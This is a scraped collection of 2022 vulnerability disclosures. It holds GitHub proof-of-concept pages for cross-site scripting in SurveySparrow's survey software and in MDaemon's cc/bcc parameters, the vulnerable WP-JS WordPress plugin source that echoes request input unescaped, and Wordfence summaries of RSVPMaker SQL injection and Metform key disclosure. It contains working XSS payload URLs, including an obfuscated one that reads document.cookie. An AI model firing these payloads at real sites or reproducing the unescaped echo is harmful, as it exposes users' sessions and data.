Survey Sparrow Enterprise Survey Software 2022 has a Stored cross-site scripting (XSS) vulnerability in the Signup parameter.

Permalink

main

Switch branches/tags

**Enterprise-Survey-Software/**Enterprise-Survey-Software 2022****

Go to file

*   Go to file

*   Copy path
*   Copy permalink

Cannot retrieve contributors at this time

18 lines (11 sloc) 452 Bytes

Raw Blame

*   Open with Desktop
*   View raw
*   Copy raw contents
*   View blame

Product: Enterprise-Survey-Software 2022

For Reflected XSS

https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//

For Stored XSS

Visit https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//

now click on signup button

or

visit

https://LOCALHOST/signup?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//

For demo

https://app.surveysparrow.com/

CVE-2022-29727: Enterprise-Survey-Software/Enterprise-Survey-Software 2022 at main · haxpunk1337/Enterprise-Survey-Software

Permalink

**1** contributor

**Users who have contributed to this file**

Product: Enterprise-Survey-Software 2022

For Reflected XSS

https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//

For Stored XSS

Visit https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//

now click on signup button

or

visit

https://LOCALHOST/signup?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//

For demo

https://app.surveysparrow.com/

An Authenticated Reflected Cross-site scripting at BCC Parameter was discovered in MDaemon before 22.0.0 .

Permalink

main

Switch branches/tags

**MDaemon-/**MDaemon XSS at BCC endpoint****

Go to file

*   Go to file

*   Copy path
*   Copy permalink

Cannot retrieve contributors at this time

9 lines (5 sloc) 243 Bytes

Raw Blame

*   Open with Desktop
*   View raw
*   Copy raw contents
*   View blame

Product: MDaemon

Status: Fixed at version 22.0.0

Poc

https://localhost/WorldClient.dll?Session=<session\_cookie>&View=Compose&ReturnConfig=1&t=&spellcheck&cc=GTN&bcc=%22%3E%3Cscript%3Ealert(%27XSS\_TEST\_BY\_GTN%27)%3C/script%3E

XSS executed

CVE-2022-29976: MDaemon-/MDaemon XSS at BCC endpoint at main · haxpunk1337/MDaemon-

Permalink

main

Switch branches/tags

**MDaemon-/**MDaemon XSS at BCC endpoint****

Go to file

*   Go to file

*   Copy path
*   Copy permalink

haxpunk1337 Create MDaemon XSS at BCC endpoint

Latest commit 820ea2b Apr 25, 2022

**History**

**1** contributor

**Users who have contributed to this file**

9 lines (5 sloc) 243 Bytes

Raw Blame

*   Open with Desktop
*   View raw
*   Copy raw contents
*   View blame

Product: MDaemon

Status: Fixed at version 22.0.0

Poc

https://localhost/WorldClient.dll?Session=<session\_cookie>&View=Compose&ReturnConfig=1&t=&spellcheck&cc=GTN&bcc=%22%3E%3Cscript%3Ealert(%27XSS\_TEST\_BY\_GTN%27)%3C/script%3E

XSS executed

An Authenticated Reflected Cross-site scripting at CC Parameter was discovered in MDaemon before 22.0.0 .

Permalink

main

Switch branches/tags

**MDaemon-/**MDaemon XSS at CC endpoint****

Go to file

*   Go to file

*   Copy path
*   Copy permalink

Cannot retrieve contributors at this time

8 lines (5 sloc) 239 Bytes

Raw Blame

*   Open with Desktop
*   View raw
*   Copy raw contents
*   View blame

Product: MDaemon

Status: Fixed at version 22.0.0

Poc

https://localhost/WorldClient.dll?Session=<SESSION\_COOKIE>&View=Compose&ReturnConfig=1&t=&spellcheck&cc=%22%3E%3Cscript%3Ealert(%27XSS\_TEST\_BY\_GTN%27)%3C/script%3E&bcc=

XSS executed

CVE-2022-29975: MDaemon-/MDaemon XSS at CC endpoint at main · haxpunk1337/MDaemon-

Permalink

main

Switch branches/tags

**MDaemon-/**MDaemon XSS at CC endpoint****

Go to file

*   Go to file

*   Copy path
*   Copy permalink

haxpunk1337 Create MDaemon XSS at CC endpoint

Latest commit 1591439 Apr 25, 2022

**History**

**1** contributor

**Users who have contributed to this file**

8 lines (5 sloc) 239 Bytes

Raw Blame

*   Open with Desktop
*   View raw
*   Copy raw contents
*   View blame

Product: MDaemon

Status: Fixed at version 22.0.0

Poc

https://localhost/WorldClient.dll?Session=<SESSION\_COOKIE>&View=Compose&ReturnConfig=1&t=&spellcheck&cc=%22%3E%3Cscript%3Ealert(%27XSS\_TEST\_BY\_GTN%27)%3C/script%3E&bcc=

XSS executed

The WP-JS plugin for WordPress contains a script called wp-js.php with the function wp_js_admin, that accepts unvalidated user input and echoes it back to the user. This can be used for reflected Cross-Site Scripting in versions up to, and including, 2.0.6.

1<?php2/\*3Plugin Name: WP JS4Plugin URI: http://www.halmatferello.com/lab/wp-js/5Description: Automatically GZIP your JS files and applies jsmin algorithm. Also add JavaScript files to specific posts/pages.6Author: Halmat Ferello7Author URI: http://www.halmatferello.com8Version: 2.0.6910Copyright (C) 2008 Halmat Ferello1112Released under the GPL v.2, http://www.gnu.org/copyleft/gpl.html1314This program is distributed in the hope that it will be useful,15but WITHOUT ANY WARRANTY; without even the implied warranty of16MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the17GNU General Public License for more details.18\*/1920include\_once('wp-js-functions.php');2122define('WP\_JS\_VERSION', '2.0.6');23define('WP\_JS\_URL', get\_option('siteurl').'/'.PLUGINDIR.'/wp-js');24define('WP\_JS\_PATH', ABSPATH.PLUGINDIR.'/wp-js');25define('WP\_JS\_CACHE\_PATH', WP\_JS\_PATH.'/cache/');2627define('TEMPLATEURL', get\_theme\_root\_uri().'/'.get\_stylesheet());2829if ( !is\_dir(WP\_JS\_CACHE\_PATH) ) @mkdir(WP\_JS\_CACHE\_PATH);3031if (!defined('WP\_ADMIN')) {32        wp\_js\_setting(array(33                'u' \=> TEMPLATEURL,34                'p' \=> get\_theme\_root().'/'.get\_stylesheet(),35                'c' \=> wp\_js\_cache\_time()36        ));37}3839function wp\_js($file, $echo \= true)40{41        if (!file\_exists(WP\_JS\_CACHE\_PATH.'wp-js-settings.txt')) {42                $url\_array \= array(43                        'c' \=> wp\_js\_cache\_time(),44                        'u' \=> TEMPLATEURL,45                        'p' \=> TEMPLATEPATH46                );47        }48        49        $wp\_js\_attributes \= wp\_js\_url($url\_array);50        51        if (wp\_js\_activation() \== 'on') {52                $string \= get\_settings('siteurl') . '/wp-content/plugins/wp-js/wp-js-compress.php?f=' . $file. $wp\_js\_attributes . '&amp;t='.wp\_js\_modified\_time();53        } else if (wp\_js\_activation() \== 'off') {54                $string \= TEMPLATEURL.'/' . $file;55        }56        57        if ($echo \== true) {58                echo $string;59        } else {60                return $string;61        }62}6364function wp\_js\_url($array)65{66        if (count($array) \> 0) {67                $string \= '';68                foreach ($array as $key \=> $value) {69                        $string .= "&amp;".$key."=".wp\_js\_encode\_string($value);70                }71                return $string;72        } else {73                return FALSE;74        }75}7677function wp\_js\_file\_structure()78{79        $js\_files \= wp\_js\_directory\_map(WP\_JS\_CACHE\_PATH);80        if (count($js\_files) \> 0 && !empty($js\_files)) {81?>82<p>JavaScript files cached (/wp-content/themes/<?php echo get\_stylesheet(); ?>):</p>83<ul>84                <?php foreach ($js\_files as $file): ?>85                <?php86                        $files\_within\_array \= unserialize(file\_get\_contents(WP\_JS\_CACHE\_PATH.$file));87                ?>88                        <li>89                                <?php if (count($files\_within\_array) \> 1): ?><strong>(Grouped)</strong>90                                        <ul>91                                                <?php foreach ($files\_within\_array as $js\_file):?><li\><?php echo $js\_file; ?></li><?php endforeach ?>92                                        </ul>93                                <?php else: ?>94                                        <?php foreach ($files\_within\_array as $js\_file): echo $js\_file;?><?php endforeach ?>95                                <?php endif ?>96                        </li>97                <?php endforeach ?>98</ul>99<?php100        } else {101                echo "<p><strong>No JavaScript files are cached.</strong></p>";102        }103}104105function wp\_js\_admin()106{               107        if ($\_REQUEST\['wp\_js\_clear\_cache'\]) {108                if (wp\_js\_is\_directory\_writable(WP\_JS\_CACHE\_PATH)) {109                        wp\_js\_delete();110                } else {111                        $\_REQUEST\['wp\_js\_message'\] \= 'Unable to clear cache.';112                }113        }114        115        if ($\_REQUEST\['wp\_js\_edit\_expiry'\]) {116                wp\_js\_modified\_time(TRUE);117                update\_option('wp\_js\_cache\_time', $\_REQUEST\['wp\_js\_cache\_time'\]);118        }119        if ($\_REQUEST\['wp\_js\_activation'\]) {120                wp\_js\_activation(true);121        }122        if ($\_REQUEST\['wp\_js\_within\_posts\_activation'\]) {123                wp\_js\_within\_posts\_activation(true);124        }125        126        $cache\_time \= wp\_js\_cache\_time();127128        ?>129        130        <style type="text/css" media="screen">131                fieldset {132                        border: 1px solid #aaa;133                        padding: 12px;134                }135                fieldset#activate-within-posts, fieldset#expiry-time, fieldset#clear-cache {136                        margin-top: 12px;137                }138        </style>139        140        <?php if ($\_REQUEST\['wp\_js\_message'\]) : ?>141                <div id="message" class="updated fade"><p><?php echo $\_REQUEST\['wp\_js\_message'\]; ?></p></div>142        <?php endif; ?>143        144        <div id="wp-js" class="wrap">145                <h2 style="margin: 8px 0; padding-top: 0">WP JS <?php echo WP\_JS\_VERSION; ?></h2>146                147                <p style="color:#1CCD00;">URLs must be relative to your current theme.<br />For example: <code>wp\_js('file.js')</code> = <?php echo TEMPLATEURL; ?>/file.js</p>148                149                <fieldset id="activate"> 150                <legend>Activate</legend>151                <p>Turn the plugin on / off. wp\_js() will still work but no caching or compressing is applied.</p>152                <?php153                echo '<form name="wp\_js\_active" action="'. $\_SERVER\["REQUEST\_URI"\] . '" method="post">';154                if (wp\_js\_activation() \== 'on') {155                        echo '<label for="wp\_js\_activation\_on"><input type="radio" id="wp\_js\_activation\_on" name="wp\_js\_activation" value="on" checked="checked" /> On</label>';156                } else {157                        echo '<label for="wp\_js\_activation\_on"><input type="radio" id="wp\_js\_activation\_on" name="wp\_js\_activation" value="on" /> On</label>';158                }159                if (wp\_js\_activation() \== 'off') {160                        echo ' <label for="wp\_js\_activation\_off"><input type="radio" name="wp\_js\_activation" id="wp\_js\_activation\_off" value="off" checked="checked" /> Off</label><br />';161                } else {162                        echo ' <label for="wp\_js\_activation\_off"><input type="radio" name="wp\_js\_activation" id="wp\_js\_activation\_off" value="off" /> Off</label><br />';163                }164                echo '<div class="submit"><input type="submit" value="Change activation &raquo;" name="wp\_js\_active" /></div>';165                echo '<input type="hidden" name="wp\_js\_message" value="Plugin activation changed.">';166                wp\_nonce\_field('wp-cache');167                echo "</form>\\n";168                ?></fieldset>169                170                171                <fieldset id="activate-within-posts">172                <legend>Activate within posts</legend>173                <p>Allows you to add JavaScript files to specific posts/pages.</p>174                <?php175                echo '<form name="wp\_js\_within\_posts\_activation" action="'. $\_SERVER\["REQUEST\_URI"\] . '" method="post">';176                if (wp\_js\_within\_posts\_activation() \== 'on') {177                        echo '<label for="wp\_js\_within\_posts\_activation\_on"><input type="radio" id="wp\_js\_within\_posts\_activation\_on" name="wp\_js\_within\_posts\_activation" value="on" checked="checked" /> On</label>';178                } else {179                        echo '<label for="wp\_js\_within\_posts\_activation\_on"><input type="radio" id="wp\_js\_within\_posts\_activation\_on" name="wp\_js\_within\_posts\_activation" value="on" /> On</label>';180                }181                if (wp\_js\_within\_posts\_activation() \== 'off') {182                        echo ' <label for="wp\_js\_within\_posts\_activation\_off"><input type="radio" name="wp\_js\_within\_posts\_activation" id="wp\_js\_within\_posts\_activation\_off" value="off" checked="checked" /> Off</label><br />';183                } else {184                        echo ' <label for="wp\_js\_within\_posts\_activation\_off"><input type="radio" name="wp\_js\_within\_posts\_activation" id="wp\_js\_within\_posts\_activation\_off" value="off" /> Off</label><br />';185                }186                echo '<div class="submit"><input type="submit" value="Change activation &raquo;" name="wp\_js\_active" /></div>';187                echo '<input type="hidden" name="wp\_js\_message" value="Plugin within posts activation changed.">';188                wp\_nonce\_field('wp-cache');189                echo "</form>\\n";190                ?></fieldset>191                192                193                <fieldset id="expiry-time">194                <legend>Expiry Time</legend>195                <p>Set the time for when the browser downloads a fresh copy of your JavaScript files.</p>196                <?php197                echo '<form name="wp\_js\_edit\_expiry" action="'. $\_SERVER\["REQUEST\_URI"\] . '" method="post">';198                echo '<label for="wp\_expiry">Expire time:</label> ';199                echo '<input type="text" size="6" name="wp\_js\_cache\_time" value="'.$cache\_time.'" /> seconds<br />';200                echo '<div class="submit"><input type="submit" value="Change expiration &raquo;" name="wp\_js\_edit\_expiry" /></div>';201                echo '<input type="hidden" name="wp\_js\_message" value="Cache expiry changed">';202                wp\_nonce\_field('wp-cache');203                echo "</form>\\n";204                ?></fieldset>205                206                <fieldset id="clear-cache"> 207                <legend>Clear cache</legend>208                209                <?php if (!wp\_js\_is\_directory\_writable(WP\_JS\_CACHE\_PATH)): ?>210                        <p style="border: 1px solid #f00; padding: 2px; color: #f00;"><strong>Cache not available</strong><br/>The <code>wp-js</code> folder <strong>is not writable</strong>. Please change the plugin folder permissions to <code>777</code>.</p>211                <?php endif ?>212                213                <p>Clear your cache if you have updated your JavaScript files.</p>214                <?php wp\_js\_file\_structure(); ?>215                <?php216                echo '<form name="wp\_js\_clear\_cache" action="'. $\_SERVER\["REQUEST\_URI"\] . '" method="post">';217                echo '<div class="submit"><input type="submit" value="Clear Cache" name="wp\_js\_clear\_cache" /></div>';218                echo '<input type="hidden" name="wp\_js\_message" value="Cached cleared">';219                wp\_nonce\_field('wp-cache');220                echo "</form>\\n";221                ?></fieldset>222        </div><?php223}224225 // Admin Panel   226function wp\_js\_add\_pages()227{228        add\_options\_page('WP JS options', 'WP JS', 8, \_\_FILE\_\_, 'wp\_js\_admin');            229}230231// Add Options Page232add\_action('admin\_menu', 'wp\_js\_add\_pages');233234if (wp\_js\_within\_posts\_activation() \== 'on') {235        include\_once('wp-js-files-list.php');236}237238239?>

CVE-2022-1567: wp-js.php in wp-js/trunk – WordPress Plugin Repository

The RSVPMaker plugin for WordPress is vulnerable to unauthenticated SQL Injection due to missing SQL escaping and parameterization on user supplied data passed to a SQL query in the rsvpmaker-util.php file. This makes it possible for unauthenticated attackers to steal sensitive information from the database in versions up to and including 9.2.5.

CVE-2022-1453: Vulnerability Advisories - Wordfence

The RSVPMaker plugin for WordPress is vulnerable to unauthenticated SQL Injection due to missing SQL escaping and parameterization on user supplied data passed to a SQL query in the rsvpmaker-api-endpoints.php file. This makes it possible for unauthenticated attackers to steal sensitive information from the database in versions up to and including 9.2.6.

CVE-2022-1505: Vulnerability Advisories - Wordfence

The Metform WordPress plugin is vulnerable to sensitive information disclosure due to improper access control in the ~/core/forms/action.php file which can be exploited by an unauthenticated attacker to view all API keys and secrets of integrated third-party APIs like that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more, in versions up to and including 2.1.3.

Tag

#xss